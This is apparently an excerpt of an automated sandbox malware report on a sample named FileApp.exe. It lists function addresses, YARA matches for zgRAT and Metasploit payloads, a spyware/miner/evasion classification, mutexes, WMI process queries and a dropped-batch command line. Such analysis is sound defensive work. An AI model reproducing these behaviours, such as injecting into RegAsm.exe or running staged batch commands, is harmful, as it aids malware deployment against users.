Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E94B0 9_2_056E94B0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056EE700 9_2_056EE700
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056EA640 9_2_056EA640
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056EA630 9_2_056EA630
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E56CA 9_2_056E56CA
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056E81B0 9_2_056E81B0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056EB9A3 9_2_056EB9A3
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056EB9B0 9_2_056EB9B0
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_056F89C8 9_2_056F89C8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_058A6B88 9_2_058A6B88
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_058A09B7 9_2_058A09B7
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_058A09C8 9_2_058A09C8
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Code function: 9_2_058A3BD4 9_2_058A3BD4
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00407577 14_2_00407577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_00B5DC74 21_2_00B5DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D76948 21_2_04D76948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D70AFC 21_2_04D70AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D772D0 21_2_04D772D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D77C20 21_2_04D77C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D70040 21_2_04D70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D70006 21_2_04D70006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D70AF9 21_2_04D70AF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D77C10 21_2_04D77C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D71FF0 21_2_04D71FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_04D75A43 21_2_04D75A43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_060967D8 21_2_060967D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609A3D8 21_2_0609A3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_06093F50 21_2_06093F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_06096FE8 21_2_06096FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_06096FF8 21_2_06096FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C9C9E0 22_2_69C9C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BB49F0 22_2_69BB49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C109A0 22_2_69C109A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C3A9A0 22_2_69C3A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C409B0 22_2_69C409B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BD6900 22_2_69BD6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BB8960 22_2_69BB8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C868E0 22_2_69C868E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C54840 22_2_69C54840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BD0820 22_2_69BD0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C0A820 22_2_69C0A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C86BE0 22_2_69C86BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C20BA0 22_2_69C20BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BFEA80 22_2_69BFEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C2EA00 22_2_69C2EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BFCA70 22_2_69BFCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C38A30 22_2_69C38A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B84DB0 22_2_69B84DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D0CDC0 22_2_69D0CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C16D90 22_2_69C16D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CAAD50 22_2_69CAAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C4ED70 22_2_69C4ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D08D20 22_2_69D08D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BDECD0 22_2_69BDECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B7ECC0 22_2_69B7ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C46C00 22_2_69C46C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B8AC60 22_2_69B8AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5AC30 22_2_69C5AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B8EFB0 22_2_69B8EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5EFF0 22_2_69C5EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B80FE0 22_2_69B80FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC8FB0 22_2_69CC8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B86F10 22_2_69B86F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C42F70 22_2_69C42F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC0F20 22_2_69CC0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BEEF40 22_2_69BEEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C20EC0 22_2_69C20EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C06E90 22_2_69C06E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B8AEC0 22_2_69B8AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1EE70 22_2_69C1EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C60E20 22_2_69C60E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B801E0 22_2_69B801E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BF6130 22_2_69BF6130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C64130 22_2_69C64130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE8140 22_2_69BE8140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B900B0 22_2_69B900B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B78090 22_2_69B78090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5C0B0 22_2_69C5C0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C4C000 22_2_69C4C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BCE070 22_2_69BCE070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C48010 22_2_69C48010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BDE3B0 22_2_69BDE3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BB23A0 22_2_69BB23A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BD43E0 22_2_69BD43E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BF2320 22_2_69BF2320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C9C360 22_2_69C9C360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C16370 22_2_69C16370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC2370 22_2_69CC2370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B82370 22_2_69B82370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B88340 22_2_69B88340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D062C0 22_2_69D062C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C522A0 22_2_69C522A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C4E2B0 22_2_69C4E2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C18250 22_2_69C18250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C08260 22_2_69C08260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C4A210 22_2_69C4A210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C58220 22_2_69C58220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B745B0 22_2_69B745B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C4A5E0 22_2_69C4A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C0E5F0 22_2_69C0E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C84540 22_2_69C84540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC8550 22_2_69CC8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C20570 22_2_69C20570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE2560 22_2_69BE2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BD8540 22_2_69BD8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1A4D0 22_2_69C1A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CAA480 22_2_69CAA480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BC64D0 22_2_69BC64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE4420 22_2_69BE4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B98460 22_2_69B98460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C0A430 22_2_69C0A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BAA7D0 22_2_69BAA7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C00700 22_2_69C00700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1E6E0 22_2_69C1E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BDE6E0 22_2_69BDE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BA46D0 22_2_69BA46D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BDC650 22_2_69BDC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C199C0 22_2_69C199C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C179F0 22_2_69C179F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B91980 22_2_69B91980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE59F0 22_2_69BE59F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C51990 22_2_69C51990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BB99D0 22_2_69BB99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C3D960 22_2_69C3D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CCF900 22_2_69CCF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BFF960 22_2_69BFF960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C35920 22_2_69C35920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1F8C0 22_2_69C1F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5F8F0 22_2_69C5F8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CDB8F0 22_2_69CDB8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B8D8E0 22_2_69B8D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BB38E0 22_2_69BB38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BDD810 22_2_69BDD810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BD9BA0 22_2_69BD9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B71B80 22_2_69B71B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BC7BF0 22_2_69BC7BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C65B90 22_2_69C65B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C49BB0 22_2_69C49BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BCBB20 22_2_69BCBB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5FB60 22_2_69C5FB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B81AE0 22_2_69B81AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C5DAB0 22_2_69C5DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D09A50 22_2_69D09A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BBFA10 22_2_69BBFA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C21A10 22_2_69C21A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C7DA30 22_2_69C7DA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C51DC0 22_2_69C51DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B73D80 22_2_69B73D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CC9D90 22_2_69CC9D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE3D00 22_2_69BE3D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CBDCD0 22_2_69CBDCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C41CE0 22_2_69C41CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C1FC80 22_2_69C1FC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B91C30 22_2_69B91C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CA9C40 22_2_69CA9C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69B83C40 22_2_69B83C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69C9DFC0 22_2_69C9DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D03FC0 22_2_69D03FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BA1F90 22_2_69BA1F90
Enables security privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0053E310 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69BA3620 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69D009D0 appears 292 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69D0D930 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69D0DAE0 appears 65 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69BA9B10 appears 92 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69BDC5E0 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 69CB9F30 appears 50 times
One or more processes crash
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Sample file is different than original file name gathered from version info
Source: FileApp.exe, 00000000.00000000.2114249018.0000000000F8B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameadsbrowser.exe$ vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2119885644.00000000015FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePE.dll& vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004FD3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.00000000051AD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVXxHvcJSL.dll0 vs FileApp.exe
Source: FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamePE.dll& vs FileApp.exe
Uses 32bit PE files
Source: FileApp.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000B.00000002.2733299099.0000000001980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000C.00000002.2767261547.000000000264A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000B.00000002.2733299099.0000000001AD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@106/105@12/18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 22_2_69BE0300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 22_2_004190A0
Source: C:\Users\user\Desktop\FileApp.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FileApp.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\UipomonaWW_2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Mutant created: \Sessions\1\BaseNamedObjects\IntelPowerEExpert
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe File created: C:\Users\user\AppData\Local\Temp\nsvEF5F.tmp
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: FileApp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FileApp.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
